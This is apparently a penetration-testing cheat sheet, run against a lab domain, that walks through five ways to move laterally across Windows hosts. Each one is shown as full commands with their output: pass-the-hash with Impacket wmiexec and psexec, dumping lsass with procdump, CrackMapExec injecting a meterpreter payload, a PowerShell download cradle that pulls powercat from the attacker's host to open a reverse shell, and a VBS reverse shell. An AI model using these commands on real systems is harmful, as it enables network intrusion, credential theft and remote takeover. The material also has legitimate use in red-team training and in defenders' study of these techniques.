====================================================================================================================================================
Lateral movement with various tools (WMIexec, PSexec, CrackMapExec, SMBclient) 
====================================================================================================================================================

Requirement: 
> You need valid admin credentials on the remote Windows server or workstation

Index
======
1. WMIexec (Impacket version - Pass-The-Hash or with login/password)
2. PSexec (Impacket version - Pass-The-Hash or with login/password)
3. CrackMapExec (Pass-The-Hash or with login/password) + Metasploit (meterpreter reverse shell)
4. WMIexec (impacket) + Powershell (PowerCat.ps1) + NetCat
5. SMBclient + VBS reverse shell + CrackMapExec (WMI) + NetCat


========================================================================================================================
Example 1 - WMIexec (Impacket version - Pass-The-Hash or with login/password)
========================================================================================================================

jeff@kali-Linux:~$ wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:ad5f04d33d00db5f062376115c5acdc9 administrator@192.168.1.50
Impacket v0.9.21.dev1 - Copyright 2020 SecureAuth Corporation

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands

C:\>whoami
win-evagj1t16qd\administrator

C:\>cd Users
C:\Users>cd administrator                                                                                                                                         
C:\Users\administrator>cd desktop
C:\Users\administrator\desktop>cd tools


C:\Users\administrator\desktop\tools>cd Powerup
C:\Users\administrator\desktop\tools\Powerup>dir
 Volume in drive C has no label.
 Volume Serial Number is C022-C9A0

 Directory of C:\Users\administrator\desktop\tools\Powerup
 03/23/2020  03:41 PM    <DIR>          .
 03/23/2020  03:41 PM    <DIR>          ..
 03/23/2020  03:49 PM           303,366 PowerUp-invoke-allchecks.txt
 05/29/2017  11:35 PM           562,841 PowerUp.ps1
               2 File(s)        866,207 bytes
               2 Dir(s)   9,156,866,048 bytes free

C:\Users\administrator\desktop\tools\Powerup>get PowerUp-invoke-allchecks.txt
[*] Downloading C:\\Users\administrator\desktop\tools\Powerup\PowerUp-invoke-allchecks.txt

C:\>cd temp
C:\temp>put procdump64.exe
[*] Uploading procdump64.exe to C:\temp\procdump64.exe

C:\Temp\>procdump64.exe -accepteula -ma lsass.exe lsassdump
ProcDump v9.0 - Sysinternals process dump utility
Copyright (C) 2009-2017 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com

[02:41:23] Dump 1 initiated: C:\Temp\lsassdump.dmp
[02:41:23] Dump 1 writing: Estimated dump file size is 32 MB.
[02:41:23] Dump 1 complete: 32 MB written in 0.1 seconds
[02:41:24] Dump count reached.


========================================================================================================================
Example 2 - PSexec (Impacket version - Pass-The-Hash or with login/password)
========================================================================================================================

jeff@kali:~/Documents/CTFs/BadBlood$ psexec.py security-lab/qualys@192.168.1.50
Impacket v0.9.21.dev1 - Copyright 2020 SecureAuth Corporation

Password:
[*] Requesting shares on 192.168.1.50.....
[*] Found writable share ADMIN$
[*] Uploading file pXRmNpEn.exe
[*] Opening SVCManager on 192.168.1.50.....
[*] Creating service TjVN on 192.168.1.50.....
[*] Starting service TjVN.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>hostname
TEMP-DC

C:\Windows\system32>
exit


========================================================================================================================
Example 3 - CrackMapExec (Pass-The-Hash or with login/password) + Metasploit (meterpreter reverse shell)
========================================================================================================================

jeff@kali:~/Documents/CTFs/BadBlood$ sudo crackmapexec smb 192.168.1.50 -u Qualys -p Qua1ys2020 -M pe_inject -o PATH=./payload_tcp.exe
SMB         192.168.1.50    445    TEMP-DC          [*] Windows Server 2012 R2 Standard 9600 x64 (name:TEMP-DC) (domain:SECURITY-LAB) (signing:True) (SMBv1:True)
SMB         192.168.1.50    445    TEMP-DC          [+] SECURITY-LAB\Qualys:Qua1ys2020 (Pwn3d!)
PE_INJEC... 192.168.1.50    445    TEMP-DC          [+] Executed payload
PE_INJEC...                                         [*] Waiting on 1 host(s)
PE_INJEC... 192.168.1.50                            [*] - - "GET /Invoke-ReflectivePEInjection.ps1 HTTP/1.1" 200 -
PE_INJEC... 192.168.1.50                            [*] - - "GET /payload_tcp.exe HTTP/1.1" 200 -
jeff@kali:~/Documents/CTFs/BadBlood$ 


msf5 exploit(multi/handler) > options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.22     yes       The listen address (an interface may be specified)
   LPORT     8443             yes       The listen port

Exploit target:
   Id  Name
   --  ----
   0   Wildcard Target


msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.1.22:8443 
[*] Sending stage (180291 bytes) to 192.168.1.50
[*] Meterpreter session 1 opened (192.168.1.22:8443 -> 192.168.1.50:49174) at 2020-04-18 03:02:07 +0200

meterpreter > getuid
Server username: SECURITY-LAB\Qualys

meterpreter > getprivs

Enabled Process Privileges
==========================
Name
----
SeBackupPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeCreatePagefilePrivilege
SeCreateSymbolicLinkPrivilege
SeDebugPrivilege
SeEnableDelegationPrivilege
SeImpersonatePrivilege
SeIncreaseBasePriorityPrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
SeLoadDriverPrivilege
SeMachineAccountPrivilege
SeManageVolumePrivilege
SeProfileSingleProcessPrivilege
SeRemoteShutdownPrivilege
SeRestorePrivilege
SeSecurityPrivilege
SeShutdownPrivilege
SeSystemEnvironmentPrivilege
SeSystemProfilePrivilege
SeSystemtimePrivilege
SeTakeOwnershipPrivilege
SeTimeZonePrivilege
SeUndockPrivilege


========================================================================================================================
Example 4 - WMIexec (impacket) + Powershell (PowerCat.ps1) + NetCat
========================================================================================================================

jeff@kali:~/Documents/CTFs/BadBlood$ wmiexec.py administrator@192.168.1.50 
Impacket v0.9.21.dev1 - Copyright 2020 SecureAuth Corporation

Password:
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.1.22/powercat.ps1');powercat -c 192.168.1.22 -p 8443 -e cmd


jeff@kali:~/Documents/CTFs/BadBlood$ sudo python3 -m http.server 80
[sudo] password for jeff: 
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.1.50 - - [18/Apr/2020 06:12:34] "GET /powercat.ps1 HTTP/1.1" 200 -


jeff@kali:~$ nc -nlvp 8443
listening on [any] 8443 ...
connect to [192.168.1.22] from (UNKNOWN) [192.168.1.50] 49880
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\>hostname
hostname
TEMP-DC

C:\>whoami
whoami
security-lab\administrator

C:\>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is C022-C9A0

 Directory of C:\

04/18/2020  02:43 AM    <DIR>          Microsoft
08/22/2013  05:52 PM    <DIR>          PerfLogs
08/22/2013  04:50 PM    <DIR>          Program Files
08/22/2013  05:39 PM    <DIR>          Program Files (x86)
04/18/2020  05:25 AM    <DIR>          temp
06/12/2018  03:20 PM    <DIR>          Users
04/18/2020  06:12 AM    <DIR>          Windows
               0 File(s)              0 bytes
               7 Dir(s)  24,517,967,872 bytes free
C:\>


========================================================================================================================
Example 5 - VBS reverse shell + SMBclient + CrackMapExec (WMI) + NetCat
========================================================================================================================

jeff@kali:~/Documents/CTFs/BadBlood$ smbclient \\\\192.168.1.50\\C$ -U 'security-lab\\Administrator'
Enter Administrator's password: 
Try "help" to get a list of possible commands.
smb: \> cd temp
smb: \temp\> mput psnoenv.vbs
Put file psnoenv.vbs? yes
putting file psnoenv.vbs as \temp\psnoenv.vbs (550.3 kb/s) (average 550.3 kb/s)
smb: \temp\> exit


jeff@kali:~/Documents/CTFs/BadBlood$ sudo crackmapexec smb 192.168.1.50 -u Administrator -p Test123456 --exec wmiexec -X "cmd /k C:\temp\psnoenv.vbs"
SMB         192.168.1.50    445    TEMP-DC          [*] Windows Server 2012 R2 Standard 9600 x64 (name:TEMP-DC) (domain:SECURITY-LAB) (signing:True) (SMBv1:True)
SMB         192.168.1.50    445    TEMP-DC          [+] SECURITY-LAB\Administrator:Test123456 (Pwn3d!)


jeff@kali:~$ nc -nlvp 8443
listening on [any] 8443 ...
connect to [192.168.1.22] from (UNKNOWN) [192.168.1.50] 49728

C:\> whoami
whoami
security-lab\administrator

C:\> hostname
hostname
TEMP-DC

C:\> net user Administrator /domain
	net user Administrator /domain
	User name                    Administrator
	Full Name                    
	Comment                      Built-in account for administering the computer/domain
	User's comment               
	Country/region code          000 (System Default)
	Account active               Yes
	Account expires              Never

	Password last set            4/15/2020 9:03:43 AM
	Password expires             5/27/2020 9:03:43 AM
	Password changeable          4/16/2020 9:03:43 AM
	Password required            Yes
	User may change password     Yes
		                                                                                                                                                                                                 
	Workstations allowed         All
	Logon script
	User profile
	Home directory
	Last logon                   4/18/2020 4:44:46 AM
		                                                                                                                                                                                                 
	Logon hours allowed          All
		                                                                                                                                                                                                 
	Local Group Memberships      *Administrators       *Remote Desktop Users
	Global Group memberships     *Group Policy Creator *JU-twi-distlist 
				                       *Schema Admins        *JA-marimart0-distlist    
				                       *Domain Admins        *Domain Users  
				                       *Enterprise Admins  
	The command completed successfully.

C:\> 

